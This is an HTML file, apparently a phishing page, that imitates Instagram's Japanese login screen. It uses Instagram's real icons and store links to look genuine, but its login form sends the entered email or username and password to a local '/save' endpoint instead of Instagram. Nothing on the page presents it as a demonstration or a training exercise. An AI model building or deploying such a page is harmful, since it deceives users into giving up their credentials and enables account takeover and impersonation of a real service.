<!DOCTYPE html>
<html lang="ja">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="static/css/style.css">
        <title>Instagram</title>
        <link
            data-default-icon="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png"
            rel="icon"
            sizes="192x192"
            href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNE-OHk_8a.png"
        >
        <meta name="robots" content="noarchive, noimageindex">
        <meta charset="utf-8">
        <meta name="apple-mobile-web-app-status-bar-style" content="default">
        <meta name="mobile-web-app-capable" content="yes">
        <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=2, viewport-fit=cover">
        <meta name="theme-color" content="#FFFFFF">
        <link rel="apple-touch-icon" sizes="76x76" href="https://static.cdninstagram.com/rsrc.php/v3/yR/r/lam-fZmwmvn.png">
        <link rel="apple-touch-icon" sizes="120x120" href="https://static.cdninstagram.com/rsrc.php/v3/ys/r/aM-g435MtEX.png">
        <link rel="apple-touch-icon" sizes="152x152" href="https://static.cdninstagram.com/rsrc.php/v3/yx/r/H1l_HHqi4p6.png">
        <link rel="apple-touch-icon" sizes="167x167" href="https://static.cdninstagram.com/rsrc.php/v3/yB/r/-7Z_RkdLJUX.png">
        <link rel="apple-touch-icon" sizes="180x180" href="https://static.cdninstagram.com/rsrc.php/v3/yG/r/De-Dwpd5CHc.png">
        <link
            data-default-icon="https://static.cdninstagram.com/rsrc.php/y4/r/QaBlI0OZiks.ico"
            rel="shortcut icon"
            type="image/x-icon"
            href="https://static.cdninstagram.com/rsrc.php/y4/r/QaBlI0OZiks.ico"
        >
    </head>
    <body>
        <main class="flex align-items-center justify-content-center">
            <section id="mobile" class="flex"></section>
            <section id="auth" class="flex direction-column">
                <div class="panel login flex direction-column">
                    <h1 title="Instagram" class="flex justify-content-center">
                        <img src="images/instagram.svg" alt="Instagram logo" title="Instagram logo" style="height: 70px;">
                    </h1>
                    <form action="/save" method="post">
                        <label for="email" class="sr-only">電話番号、ユーザーネーム、メールアドレス</label>
                        <input
                            id="emailInput"
                            name="email"
                            type="text"
                            placeholder="電話番号、ユーザーネーム、メールアドレス"
                        >
                        <label for="password" class="sr-only">パスワード</label>
                        <input
                            id="passwordInput"
                            name="password"
                            type="password"
                            placeholder="パスワード"
                        >
                        <button type="submit">
                            ログイン
                        </button>
                    </form>
                </div>
                <div class="panel register flex justify-content-center">
                    <p>アカウントをお持ちでないですか？</p>
                    <a href="https://www.instagram.com/accounts/emailsignup/">登録する</a>
                </div>
                <div class="app-download flex direction-column align-items-center">
                    <p>ダウンロード</p>
                    <div class="flex justify-content-center">
                        <a href="https://apps.apple.com/jp/app/instagram/id389801252">
                            <img src="images/apple-button.png" alt="Imagem com a logo da Apple Store" title="Imagem com a logo da Apple Store">
                        </a>
                        <a href="https://play.google.com/store/apps/details?id=com.instagram.android">
                            <img src="images/googleplay-button.png" alt="Imagem com a logo da Google Play" title="Imagem com a logo da Google Play">
                        </a>
                    </div>
                </div>
            </section>
        </main>
    </body>
</html>
